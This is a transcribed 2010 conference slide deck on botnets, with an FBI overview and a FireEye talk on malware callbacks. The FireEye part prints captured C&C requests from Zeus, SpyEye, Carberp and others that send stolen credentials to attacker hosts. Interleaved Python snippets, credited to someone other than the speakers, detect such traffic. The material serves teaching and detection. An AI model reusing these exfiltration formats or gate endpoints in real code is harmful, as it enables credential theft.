MASTER_October.web Conference PPT


  • 8/6/2019 MASTER_October.web Conference PPT

    1/44

    Botnets

    ISSA Web Conference, October 26, 2010

    Start Time: 9 am US Pacific, Noon US Eastern, 5 pm London


    Sponsored by:


    Welcome: Conference Moderator


    Phillip H Griffin

    Member - ISSA Educational Advisory Council, Web Conferences Committee


    Agenda

    How Botnets Have Evolved

    Chris Calderon - Special Agent, FBI

    Rooting Out the Bad Actors

    Alex Lanstein - Systems Consulting Engineer, FireEye

    Joint Speaker Question & Answer

    Closing Comments


    How Botnets Have Evolved

    presented by

    Special Agent Chris Calderon

    FBI

    UNCLASSIFIED


    Agenda

    What is a botnet?

    How are botnets created?

    Why are botnets created?

    Basic structure of a botnet

    Taking down a botnet

    How botnets are evolving

    Botnets in the news

    Questions

    UNCLASSIFIED


    What is a botnet?

    A network of compromised computers

    (robots/bots)

    Controlled by a bot master / herder

    Used to carry out various illegal activities

    Services are often sold to other criminal elements

    UNCLASSIFIED


    How are botnets created?

    Setup

    Obtain reliable infrastructure

    Develop malware and C&C software

    Victims

    Malware loaded onto victim machines

    Done through exploits and/or social engineering

    Manage

    Continually update software / instructions to bots

    Maintain statistics for the botnet

    UNCLASSIFIED


    Why are botnets created?

    Spam

    Distributed Denial of Service (DDoS)

    Click Fraud

    Fake Anti-Virus

    Credential Theft

    Proxy Service

    Cyber Warfare

    UNCLASSIFIED


    Basic Structure

    [Diagram: Bot Master / Herder -> C&C Servers -> Victims]

    UNCLASSIFIED


    Taking down a botnet

    [Diagram: the same Bot Master / Herder -> C&C Servers -> Victims structure, repeated for the take-down discussion]

    UNCLASSIFIED


    Botnets evolving

    [Diagram: Bot Master / Herder -> C&C Servers -> Proxies -> Victims; a proxy layer now sits between the C&C Servers and the Victims]

    UNCLASSIFIED


    Botnets evolving

    [Diagram: Bot Master / Herder -> Proxy -> C&C Servers -> Proxy -> Victims; proxies now sit on both sides of the C&C Servers]

    UNCLASSIFIED


    Botnets in the news

    ZEUS

    Steals and logs online banking credentials

    Primarily targets high balance accounts

    Money mules used to get money to bad actors

    Kit now used by many different groups

    Estimated $70,000,000 stolen from US banks

    UNCLASSIFIED


    Botnets in the news

    MARIPOSA (BUTTERFLY)

    Steals online credentials, and also used in DDoS attacks

    Estimated 12 million infected computers

    Bad actors traced to Spain and arrested

    Criminal proceedings ongoing

    UNCLASSIFIED


    Botnets in the news

    SPAM BOTS

    Conficker, Cutwail, Waledac, ...

    Up to 10 million bots per botnet

    Each botnet can send billions of spam emails per day

    Spam used to distribute malware, drive online pharmaceutical sales, fake antivirus software, pay per click advertising, ...

    UNCLASSIFIED


    Questions?

    UNCLASSIFIED


    Rooting out the Bad Actors, or: p2p, fast flux, and other botnet myths

    Alex Lanstein, Senior Security Researcher

    FireEye, Inc.


    Today's Agenda

    Understanding the shift from conventional to modern malware, and the resultant hosting needs

    A few TTPs to uncover older or moderately sophisticated malware

    A detailed look at a few bots in the news


    Conventional vs. Modern, APT Malware

    Conventional Malware

    Characterized by using spreading techniques, custom C&C transport protocols, IRC communication

    Examples: Malware/worms such as Conficker, Blaster, Slammer, Mega-D, IRC bots

    Detectable through a variety of technologies/tactics:

    NetWitness/Solera, EnVision/Arcsight/Splunk, NIDS

    Port scanning, high Windows port activity, non-http over port 80, non-web traffic, etc.


    Conventional vs. Modern Malware

    Modern-ish malware: characterized by infecting via browser-based exploits

    Exploit channel: PDF, Flash, IE/FireFox, QuickTime

    C&C callback over HTTP(s)

    Malware: ZeuS, Gozi, Koobface, Rustock, SpyEye

    Partially detectable through manual traffic analysis fairly easily, but a full-time resource is needed


    World's Top Malware

    Source: FireEye Malware Intelligence Lab


    Modern Malware Infection Lifecycle

    Defenses shown on the diagram: desktop antivirus (losing the threat arms race); perimeter security (signature, rule-based); other gateway (list-based, signatures)

    Diagram nodes: compromised Web server or Web 2.0 site; callback server

    1) System gets exploited

    Drive-by attacks in casual browsing

    Links in targeted emails

    Socially engineered binaries

    2) Dropper malware installs

    First step to establish control

    Calls back out to criminal servers

    Found on compromised sites, and Web 2.0, user-created content sites

    3) Malicious data theft & long-term control established

    Uploads data stolen via keyloggers, Trojans, bots, & file grabbers

    One exploit leads to dozens of infections on same system

    Criminals have built long-term control mechanisms into system

    Where is all this malware being hosted?

    Previously we used to see malware being hosted on infected home machines

    Web filters responded by blocking access to domains that had multiple A records in residential IP space

    Now it's being hosted on dedicated servers in proper data centers. Sometimes even with their own RIR-registered IP space!
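An added example (my code, not from the talk or FireEye) of the A-record heuristic the slide describes: flag a name whose answers point at several unrelated residential hosts. The residential prefix list is a constructed placeholder, and the functions residential and looks_fast_flux are assumptions of this example.

```python
import ipaddress
from typing import Iterable

# Constructed placeholder list: prefixes an operator would tag as residential or
# dynamic broadband space. A real deployment would load ISP/ASN data instead.
RESIDENTIAL_PREFIXES = [ipaddress.ip_network(p) for p in (
    "10.0.0.0/8", "100.64.0.0/10", "172.16.0.0/12", "192.168.0.0/16",
)]

def residential(ip: str) -> bool:
    """True if the address falls inside one of the residential prefixes."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RESIDENTIAL_PREFIXES)

def looks_fast_flux(a_records: Iterable[str], min_hosts: int = 2) -> bool:
    """Flag a name whose A records resolve to several unrelated residential
    hosts, the pattern the web filters in the talk blocked. A cluster of
    addresses in one /24 is more likely a hosting block than a set of home PCs,
    so the residential answers must also spread across distinct /24s."""
    distinct = set(a_records)
    res = [ip for ip in distinct if residential(ip)]
    spread = {ipaddress.ip_network(ip + "/24", strict=False) for ip in res}
    # residential answers must dominate the record set and span several subnets
    return len(spread) >= min_hosts and 2 * len(res) > len(distinct)
```

A dedicated server with its own RIR-registered block, the hosting the slide says is now common, returns a single non-residential answer and is not flagged, which is exactly why the talk calls the old filter insufficient.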


    Root of the Problem

    There is no Internet Police!

    Who controls the Internet? ICANN? IANA? CERTs?USCYBERCOM? Tier 1 ISPs?

    Depends who you ask and how big a stink you make.


    How the Internet is delegated

    In the name space (think DNS):

    ICANN -> Registries

    Registries == Verisign, Affilias, ccTLD operators

    Registries sell to certified gTLD and regional registrars

    Registrars == namecheap.com, godaddy.com, netsol.com

    Registrars sell to registrants (end user)


    How the Internet is delegated

    In the IP space:

    ICANN/IANA (Internet Assigned Numbers Authority)

    IANA -> RIRs

    RIRs == ARIN, LACNIC, AFRINIC, APNIC, RIPE-NCC

    RIRs -> LIRs

    LIRs are generally data centers and ISPs


    ICANN't do anything!

    ICANN and the RIRs simply sign contracts. They have no regulatory authority whatsoever, presuming that the Registrar doesn't violate the contract. These contracts have no mention of content.

    Recent success against EstDomains was due to them having a convicted felon as an Officer of the company.

    Large pushback when someone even suspects they are trying to take an authoritative stance on something.


    Big bots in 2010


    Rustock still sticking around

    POST /index.php?topic=33.117 HTTP/1.1
    Accept: */*
    Accept-Language: en-us
    Referer: http://go-thailand-now.com/
    Content-Type: application/x-www-form-urlencoded
    Content-Encoding: gzip
    UA-CPU: x86
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
    Host: go-thailand-now.com
    Content-Length: 214
    Connection: Keep-Alive
    Cache-Control: no-cache


    Gozi


    POST /cgi-bin/forms.cgi HTTP/1.0
    Content-Type: multipart/form-data; boundary=--------------------------139b9b3139b9b3139b9b3
    User-Agent: IE
    Host: 91.216.215.130
    Content-Length: 453
    Pragma: no-cache

    ----------------------------139b9b3139b9b3139b9b3
    Content-Disposition: form-data; name="upload_file"; filename="3759777034.21"
    Content-Type: application/octet-stream

    URL: https://mail.google.com/mail/channel/bind?VER=8&at=KLJASDF133234901FhI &it=1121&SID=6JK1290NR3A3&RID=4611&AID=95&= mousemove
    ----------------------------139b9b3139b9b3139b9b3--


    Zeus

    POST /xed/gate.php HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; HPNTDF)
    Host: schastlivieiveselierebyta0001.com
    Content-Length: 329
    Connection: Keep-Alive
    Cache-Control: no-cache

    [329-byte binary POST body, shown on the slide as unreadable bytes]


    Tigger: Not just financials anymore

    POST /track_c.cgi HTTP/1.0
    Content-Length: 81
    [81-byte obfuscated body, shown on the slide as unreadable bytes]

    Decoded body as shown on the slide:

    SANDBOX_QEZA1290412412;append;20;Microsoft Windows XP Service Pack 3;post_log;16639;force;[[[URL: https://internal.fireeye.com/login
    Title:
    Process: C:\Program Files\Internet Explorer\iexplore.exe
    User-agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; FunWebProducts; .NET CLR 3.0.04506.30; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)]]]
    {{{_b=sandbox&_k=mypass55%23&_r=0&timezone=420&timezoneFeb=420&timezoneOct=420&clientTime=removed&awr=1&isLoginForm=1&awsnf=_5&awsn=_u&awfid=true&awcharset=UTF-8&KEYLOG=s}}}


    SpyEye: ZeuS replacement?

    GET /web/map/gate.php?guid=users1!AJKLPQ!JU1232&ver=10280&stat=ONLINE&plg=ftpbc;socks5;t2p&cpu=0&ccrc=JKLAF24&md5=9012ab902413dcf8gga89 HTTP/1.0
    User-Agent: Microsoft Internet Explorer
    Host: hahsdhsl.com
    Pragma: no-cache

    GET /maincp/gate.php?guid=user2!ND93103!893CND1&ver=10280&stat=ONLINE&cpu=0&ccrc=A91024N&md5=3fabd889712214bdbee8381337 HTTP/1.0
    User-Agent: Microsoft Internet Explorer
    Host: www.promohru.in
    Pragma: no-cache


    Carberp: Yet Another Datastealer

    POST /recv.php HTTP/1.1
    Host: 194.54.80.146
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
    Accept: text/html
    Connection: Close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 331

    uid=MYWITCH099ABE891209141FGA91AFD&brw=2&type=1&data=https%3A%2F%2Fwww%2Estarwoodhotels%2Ecom%2Fpreferredguest%2Faccount%2Fsign%5Fin%2Ehtml%3F%7CPOST%3AsuccessPath%3Dhttps%253A%252F%252Fwww%2Estarwoodhotels%2Ecom%252Fpreferredguest%252Findex%2Ehtml%26login%3DALEXLANSTEIN%2540GMAIL%2ECOM%26persist%3Dtrue%26password%3Dmypassword


    TDSS: Full on SSL

    19:11:56.590979 IP 194.28.113.21.443 > 192.168.2.44.54528: tcp 620
    [TLS server response, binary; the only readable strings are the certificate fields C=AU, ST=Some-State, O=Internet Widgits Pty Ltd (the OpenSSL request defaults), valid 100114192303Z to 110114192303Z]
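The plaintext callbacks on the Rustock through Carberp slides share traits a defender can check for without signatures; this added example (my code, not FireEye's) parses a raw HTTP request and lists those traits. The sample requests, hosts and values are constructed stand-ins modelled on the captures, and the gate names and beacon keys are taken from the slides; the TLS-wrapped TDSS traffic is out of this check's reach.

```python
from urllib.parse import parse_qs, unquote, urlsplit

# Gate script names and beacon query keys taken from the captures on the slides above
KNOWN_GATES = {"gate.php", "recv.php", "forms.cgi", "track_c.cgi"}
BEACON_KEYS = {"guid", "stat", "ver", "md5", "ccrc"}

def parse_request(raw: str):
    """Split a raw HTTP request into (method, target, version, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, version, headers, body

def callback_indicators(raw: str) -> list:
    """List the C&C-style traits of one request; empty means nothing flagged."""
    method, target, version, h, body = parse_request(raw)
    url, reasons = urlsplit(target), []
    ua = h.get("user-agent", "")
    if not ua.startswith("Mozilla/"):          # Gozi sends 'IE', SpyEye 'Microsoft Internet Explorer'
        reasons.append("non-browser User-Agent: %r" % ua)
    if "accept" not in h:                      # real browsers always send Accept
        reasons.append("no Accept header")
    host = h.get("host", "")
    if host.replace(".", "").isdigit():        # Gozi and Carberp call back to a raw IP
        reasons.append("Host is a bare IP: " + host)
    if url.path.rsplit("/", 1)[-1] in KNOWN_GATES:
        reasons.append("known gate script: " + url.path)
    if BEACON_KEYS & set(parse_qs(url.query)): # SpyEye guid/ver/stat/md5 beacon
        reasons.append("beacon parameters in query string")
    if "content-encoding" in h:                # Rustock gzips its POST body; browsers do not
        reasons.append("compressed request body")
    if "password" in unquote(unquote(body)).lower():  # Carberp double-encodes the stolen form
        reasons.append("credential field in exfiltrated body")
    return reasons

# Constructed samples modelled on the SpyEye and Carberp captures (placeholder hosts/values)
SPYEYE_LIKE = ("GET /web/map/gate.php?guid=user1!AAAA!1234&ver=10280&stat=ONLINE&cpu=0 HTTP/1.0\r\n"
               "User-Agent: Microsoft Internet Explorer\r\nHost: c2.example.test\r\nPragma: no-cache\r\n\r\n")
CARBERP_LIKE = ("POST /recv.php HTTP/1.1\r\nHost: 192.0.2.10\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1) "
                "Firefox/3.6.10\r\nAccept: text/html\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n"
                "uid=EXAMPLE&brw=2&type=1&data=https%3A%2F%2Fbank.example.test%2Flogin%7CPOST%3A"
                "login%3Duser%26password%3DREDACTED")
BENIGN = ("GET /index.html HTTP/1.1\r\nHost: www.example.test\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1) "
          "Firefox/3.6.10\r\nAccept: text/html\r\n\r\n")
```

Each trait on its own is weak (the Carberp User-Agent is a perfectly normal Firefox string), which is why the function returns the whole list rather than a verdict; a proxy log with two or more hits on one flow is the row the talk's "manual traffic analysis" would pull first.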


    FireEye, Inc. Confidential

    www.fireeye.com

    For late-breaking malware research and news:

    blog.fireeye.com

    Thank you!

    Alex Lanstein, [email protected]


    Joint Speaker Question & Answer

    Chris Calderon - Special Agent, FBI

    Alex Lanstein - Systems Consulting Engineer, FireEye


    Closing Remarks

    Online Meetings Made Easy

    Thank you to Citrix for donating this Webcast service

    Thank you to FireEye for their support of ISSA and this Web Conference


    CPE Credit

    Within 24 hours of the conclusion of this webcast, you will receive a link to a post Web Conference quiz.

    After the successful completion of the quiz you will be given an opportunity to PRINT a certificate of attendance to use for the submission of CPE credits.
